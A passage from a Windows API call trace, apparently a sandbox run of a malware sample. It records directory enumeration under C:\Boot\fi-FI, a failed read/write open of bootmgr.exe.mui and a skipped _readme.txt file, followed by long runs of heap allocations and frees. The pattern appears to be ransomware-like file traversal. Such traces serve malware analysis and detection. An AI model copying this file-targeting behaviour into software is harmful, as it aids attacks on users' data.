lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37d4080, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37d4080, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.967] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37d4080, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37d4080, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.967] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.968] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0129.968] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0129.968] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37d4080, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37d4080, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37d4080, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.968] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned=".txt" [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0129.968] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37d4080, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37d4080, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37d4080, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.968] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0129.968] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0129.968] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.968] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.968] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.970] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.971] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.972] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.973] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.974] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.975] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.975] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 